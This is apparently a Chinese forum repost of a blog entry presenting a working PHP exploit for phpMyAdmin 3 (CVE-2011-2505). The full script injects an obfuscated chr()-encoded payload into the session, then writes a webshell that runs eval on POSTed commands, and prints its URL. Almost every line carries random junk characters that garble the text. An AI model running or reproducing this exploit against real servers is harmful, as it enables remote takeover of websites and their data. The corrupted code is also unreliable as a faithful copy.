最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。6 P! a% n0 |3 b; H9 s
) X0 y. P* J1 S5 H& g
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。; X' l% X' r$ n3 I6 z- v; x' L2 i
" w* Z. e- y h9 v% L- R首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:' F- l" u( A: l4 d
一是session.auto_start = 1;' ?1 C; B: Q( @+ y1 g8 X9 q6 q
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。' e1 q* N; V f. \3 y( E
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
! y: M, s% y0 D7 g0 X3 [0 H. u7 n
) {+ m$ B- M, d在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。* b# f1 m9 H& }* b" J6 Q; c
) ~" q* `) L7 k: j6 z/ r6 c于是写了这个php版本的exp,代码如下:& i! U o9 B& K3 g: Y- r
& P! o% @! c" X#!/usr/bin/php
p; f* D [% e1 o<?php/ I; |1 k+ S# U; z
print_r('
v( w+ v0 L1 u8 I( C4 T- J+---------------------------------------------------------------------------+
& ^- v) ^; D; G7 D" Jpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]$ @& s; a6 E6 K4 {
by oldjun(www.oldjun.com)8 B P9 g5 f( C
welcome to www.t00ls.net, f: D' C) K5 K; b7 c, h6 x
mail: oldjun@gmail.com
- \: P8 I8 i+ v& T5 NAssigned CVE id: CVE-2011-2505
: }0 b0 n7 Y1 ^- f. A2 i+---------------------------------------------------------------------------+
. t, u9 L" g/ g0 `'); N) C- d$ D5 S e& ]
- Y- t. e/ N' c6 S: z* G/**# C$ V- b. E0 A7 u
* working when the directory:"config" exists and is writeable.
8 M. n! Q8 W( b3 n5 @**/
( L9 T6 j8 Q% F% d $ l2 _5 {1 x( g! S
if ($argc < 3) {! S( H' @, N8 O! r
print_r('
0 {; A2 w; Y( l& c+---------------------------------------------------------------------------+& A8 q* e7 h6 o1 T5 p: T+ G! j
Usage: php '.$argv[0].' host path) u! T! x0 m' G& i* b0 Z
host: target server (ip/hostname)* g! d0 O3 V) U3 f; {; O8 @
path: path to pma3
) k. [+ A6 ~" f) u# PExample:" ~& X Y; a8 c# e
php '.$argv[0].' localhost /pma/4 N; p( M) D/ v7 e7 c
+---------------------------------------------------------------------------+4 C! G. R Z, A/ T9 k: R E; e
');2 |) A" M0 m& u
exit;( k0 H6 `, J& |& `
}% B4 ?* J! J/ ^6 D( f/ \' J, L1 r$ x
2 {( G# N! p! [+ v1 J5 C8 `" `
$host = $argv[1];
8 R. O( h) o7 e D& N8 ?$path = $argv[2];
' m3 y5 N! `3 ]
0 O0 ~% b6 W# |* u/**
5 [4 P$ ~0 ^+ [; O; H1 t/ b8 }" m! Y * Try to determine if the directory:"config" exists
" Q0 v. v8 h1 Z9 I8 K- Y9 r**/
6 q2 W% P7 t" o$ Gecho "[+] Try to determine if the directory:config exists....\n";
: x6 n. C# `, Y+ z# }$returnstr=php_request('config/');$ l9 ~ |2 R- {6 i1 H
if(strpos($returnstr,'404')){
- T# E8 x7 B: j/ C; O: {2 L exit("[-] Exploit Failed! The directory:config do not exists!\n");4 d8 M# T7 \% v% V
}
- n q- t/ R1 F; d0 X$ [# a# {, T# e$ t. P
/**: a7 e0 m! ]$ T$ ?+ Z
* Try to get token and sessionid
& g5 V% ~) |% c6 H**/
7 X" f: X& v! |1 @3 y* J/ n# Uecho "[+] Try to get token and sessionid....\n";' o) h& Y& l. C# D. q8 k1 ~0 c
$result=php_request('index.php');2 C8 |% u7 r7 ~' O7 E0 c1 X
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);) ], k- O) b! q7 H' Z
$token=$resp[3];" T7 |- @0 u. x/ ~4 L* @
$sessionid=$resp[1];
7 L8 S3 k" k( p* uif($token && $sessionid){4 B6 m4 @2 C' c6 L& g
echo "[+] token token\n";
) } I" ?3 ^4 ~. \( G$ j echo "[+] Session ID sessionid\n";
! |3 }/ N' C, D- x1 ?}else{
' g3 S" U' \" ]4 H: e X0 p7 @7 [5 j exit("[-] Can't get token and Session ID,Exploit Failed!\n");/ O) h3 c! W! {( a; S+ p* I" f" P
}' A4 y/ p( |8 s
2 |* q3 i$ @) j- b( ^/**# q( x$ z- J+ u
* Try to insert shell into session0 [: H) A8 x( Z
**/* B8 q' l9 t% W' \/ }9 p- o( v
echo "[+] Try to insert shell into session....\n";, T5 I( _0 G; @0 Q' F9 d
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.) g9 i# s9 q9 P2 C# Y. a/ `* C
' b1 L; I7 C, a9 R- Z' F/**
: a. l8 ?3 V. R$ O+ x) [' Z/ c * Try to create webshell
& Q4 W) A( w8 N, R" _. u) P3 A**/7 W0 u0 ~2 Q" o3 ]
echo "[+] Try to create webshell....\n";
- L8 v: E! |, ~php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
5 Q# p2 I5 g! i1 S5 r/**
/ ^3 c$ ` X9 C( b * Try to check if the webshell was created successfully; u& V, I9 O( }8 |$ R9 U8 c
**/0 ?% n$ F) D _% U$ I$ _; W
echo "[+] Try to check if the webshell was created successfully....\n";/ k9 ]! o5 p, }3 b# Q" T: `
$content=php_request('config/config.inc.php');! j2 F: x0 y: V5 K
if(strpos($content,'t00ls')){, G! v5 m% d6 Z K* [8 k R
echo "[+] Congratulations! Expoilt successfully....\n";) ]# t |$ H: u
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
t! s6 ?' s/ n2 x# l+ e}else{) B& B* A5 X7 E; T$ X
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
) H1 n, Q: n+ c5 u" P}
' k9 ?2 y& M5 }$ k* O3 U0 y4 x Q/ a3 S9 |' L7 k4 i& _) N6 o+ V% J
function php_request($url,$data='',$cookie=''){! \/ q, }" S1 S
global $host, $path;/ U" o* F n4 T2 s! T& ]' n& |5 W
5 p* {& H" P' f
$method=$data?'POST':'GET';
. f( x( {/ \! p! h, F( X " P4 p7 r9 R8 Q6 ?- a0 |
$packet = $method." ".$path.$url." HTTP/1.1\r\n";7 A+ _ E1 @2 c
$packet .= "Accept: */*\r\n";, Q7 l7 Y/ G# C a; N/ `, T: L
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
9 f9 ^. d$ Q2 E/ u0 A! \3 ^' Z $packet .= "Host: $host\r\n";0 ~ R0 v" o% Q* z! d1 c; M
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";' A% U7 @, A: h" ]- j4 L5 t
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";3 D8 O$ h( c, G
$packet .= $cookie?"Cookie: $cookie\r\n":"";3 O! R' r8 y! z$ N0 P6 G
$packet .= "Connection: Close\r\n\r\n";# h0 g% P$ L. E; G
$packet .= $data?$data:"";, B6 P1 Z- H2 `8 d9 q& [8 R) y0 l) Q
4 t9 _2 h4 S8 {$ X9 d
$fp = fsockopen(gethostbyname($host), 80);
K& |( b3 I2 _* ?$ M& D if (!$fp) {% B$ o) n/ N. h- W9 x- x% K
echo 'No response from '.$host; die;
2 K$ c1 }% J! }0 r7 r }- K3 R. {; B4 o, z& }2 `. K% o, @
fputs($fp, $packet);
$ S1 Z5 E5 S$ o4 R/ n0 J! y* C. s7 n& D/ I0 v$ r) U3 Z$ L
$resp = '';
4 R: `( F4 ]% F! c" \9 L: x6 {3 m! o, ]( T+ P; L
while ($fp && !feof($fp))
m; n& ^/ C$ P+ ?* E# ~. u $resp .= fread($fp, 1024);
* I) U2 P/ Y+ h$ P0 b+ |/ }) @+ G( ?" D6 ^ `8 T$ E
return $resp;/ S/ _2 J" G" A4 i: J
}
* L% P* e# w& E0 e2 | # ]5 @ ^/ }, t/ n: S( {* D
?> 5 I1 i, }& j; q0 X9 Q- X3 o
. |